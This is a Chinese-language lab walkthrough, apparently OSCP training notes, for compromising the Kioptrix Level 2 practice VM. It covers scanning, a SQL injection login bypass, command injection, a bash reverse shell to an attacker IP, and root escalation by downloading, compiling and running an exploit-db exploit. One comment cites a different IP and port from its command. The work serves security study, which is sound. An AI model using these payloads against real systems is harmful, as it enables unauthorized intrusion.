本篇文章旨在为网络安全初学者介绍渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Kioptrix-Level 2靶机思路步骤有一个初步的了解
一、信息收集阶段
因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.60.0/24
1、扫描网段发现靶机
nmap -sP 192.168.60.0/24
# 确认网段目标存活目标
得到目标机器IP,对目标机器获取更详细的信息:
nmap -sT -sV -sC 192.168.60.164
# -sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
# -sV 尝试确定每个打开端口上运行的服务的版本
# -sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等
得到的详细信息:
二、攻击面寻找阶段
1、扫描apache2.0.52目录
(1)目标网站80及443端口状态打开,所以扫描一下网站目录
dirb http://192.168.60.164
(2)扫描出的结果
(3)随便找个目录通过浏览器访问,发现是apache的页面
2、尝试sql注入-万能密码绕过
(1)因为在信息收集阶段发现目标存在3306端口(数据库),所以可以尝试sql万能密码
admin' or 'a'='a
直接使用sql注入万能密码就可以注册进去
(2)看起来是一个网页表单用于管理员登录后执行网络中的机器Ping操作,但是没有ping的命令框
3、sql万能密码登录后查看分析源码
源码:
4、burp 抓包恢复网站输入框
(1)拦截响应,删掉注释单引号,重新发送数据包
(2)注释掉的ping功能恢复
5、网站ping命令执行
(1)ping有回显,命令执行的注入点来了,ls注入一下测试
发现可以进行远程命令执行
三、攻击阶段(反弹shell)
1、使用nc工具进行反弹shell监听
nc -lvvp 44321
# -l:这个选项告诉 Netcat 以监听模式运行,即等待进入的连接。
# -v:这个选项用于使 Netcat 显示更多的信息,如连接和接收到的数据。如果你想要看到更详细的过程
#可以重复使用 -v 选项(比如 -vv 或 -vvv)每增加一个,输出的详细程度就会增加
# -p:这个选项后面跟着的是端口号,用于指定 Netcat 应该监听哪个端口。
开始监听
2、web端输入shell命令反向连接
192.168.60.128&& bash -c 'bash -i >& /dev/tcp/192.168.60.128/44321 0>&1'
# bash -c: bash命令-c 选项告诉 bash 从下一个命令行参数中读取命令来执行
# 2.'bash -i >& /dev/tcp/192.168.60.129/3333 0>&1': -i 启动一个新的交互式 Bash 会话。
# >& /dev/tcp/192.168.60.128/44321 这是一个重定向操作,将标准输入、输出和错误都重定向到一个TCP连接
3、已经连接上,但是是apache的账号,需要进行提权
四、提权阶段
1、查看系统版本
uname -a
2、寻找系统版本漏洞
(1)可以在搜索引擎上搜该linux的系统版本号
(2)也可以在https://www.exploit-db.com/网站查找对应的漏洞(尽可能的多下载尝试,不一定每个利用文件都好使)
3、利用漏洞
(1)下载漏洞利用文件exploit
(2)文件放到攻击机/var/www/html/目录下
(3)反弹shell进行wget利用文件
wget 192.168.60.128/9542.c
(4)更换tmp目录进行下载
cd /tmp
wget 192.168.60.128/9542.c
(5)gcc编译利用文件提权
gcc 9542.c -o four
.\four
声明! 学习内容来自B站up主 泷羽sec的OSCP考证培训有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!